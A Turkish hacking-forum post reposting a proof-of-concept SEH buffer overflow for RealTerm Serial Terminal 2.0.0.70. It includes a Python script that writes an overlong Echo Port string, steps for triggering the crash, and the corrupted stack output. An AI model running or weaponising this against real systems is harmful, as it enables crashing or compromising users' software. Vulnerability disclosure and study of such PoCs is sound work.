Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...


RealTerm: Serial Terminal 2.0.0.70

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 21-02-2019 18:30   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110


RealTerm: Serial Terminal 2.0.0.70



#Exploit Title/Exploit Başlığı: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Overflow Crash (SEH) (PoC)
# Date/Tarih: 16/02/2019
# Exploit Author/Exploit Yazarı: Alejandra SA!nchez
# Vendor Homepage/Yapımcı Sitesi: https://realterm.sourceforge.io/
# Software Link/Yazılımın Linki: https://sourceforge.net/projects/realterm/files/
# Version/Versiyon: 2.0.0.70
# Tested on/Test Edilen Sistem: Windows 10 / Windows XP


# 1.- Python kodunu çalıştırın: "EchoPort.py" bu yeni bir dosya oluşturacak "EchoPort.txt" adında.
# 2.-Sonra 'EchoPort.txt' dosyasının içindekileri kopyalayın.
# 3.- realterm.exe yi açın
# 4.- 'Echo Port' sekmesine gidin.
# 5.- Kopyaladığınızı 'Port' alanına yapıştırın.
# 6.- Değiştir butonuna tıklayın.
# 7.- Tamamdır.

#PoC çalıştıktan sonra SEH zinciri böyle gözükecek :
#0012F57C 43434343
#42424242 *** CORRUPT ENTRY ***

# Ve Stack

#0012F568 41414141 AAAA
#0012F56C 41414141 AAAA
#0012F570 41414141 AAAA
#0012F574 41414141 AAAA
#0012F578 42424242 BBBB Pointer to next SEH record
#0012F57C 43434343 CCCC SE handler


buffer = "\x41" * 268
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("EchoPort.txt", "w")
f.write(buffer+nseh+seh)
f.close()




Exploit Linki :
https://cxsecurity.com/issue/WLB-2019020198



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE

 Offline  
 
Alıntı ile Cevapla
Teşekkür

Heaven Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau